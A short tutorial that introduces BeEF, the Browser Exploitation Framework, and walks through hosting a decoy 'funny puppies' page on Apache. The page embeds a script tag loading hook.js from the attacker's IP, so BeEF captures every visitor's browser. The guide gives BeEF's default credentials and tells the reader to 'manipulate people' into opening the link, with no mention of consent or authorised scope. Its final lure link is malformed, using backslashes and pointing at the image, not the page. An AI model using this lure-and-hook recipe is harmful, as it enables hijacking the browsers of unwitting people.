BeEF – The Browser Exploitation Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
1. Start Apache service if not running
service apache2 start
2. Navigate to /var/www/ directory and remove any apache default files and folders.
3. Create an empty index.html file
4. Create a folder and name it for ex. funnypuppies
5. Download and store a picture inside funnypuppies folder. The picture should contain a picture of funny puppies!
6. Create an index.html file inside funnypuppies folder.
7. Add the following html code in your index.html file.
Funny Puppies<script src="http://your.ip.address:3000/hook.js"></script><img src="funnypuppies.jpg" alt="" />
8. Open BeEF. GoTo Application -> Kali Linux -> Exploitation Tools -> BeEF XSS Framework -> beef
9. Your browser will open the address, http://127.0.0.1:3000/ui/authentication. Default BeEF username: beef, and password: beef.
10. Now you have to manipulate people to open your link, http:\\your.external.ip.address\funnypuppies.jpg. Who ever visit the link, her browser will appear in BeEF’s tree.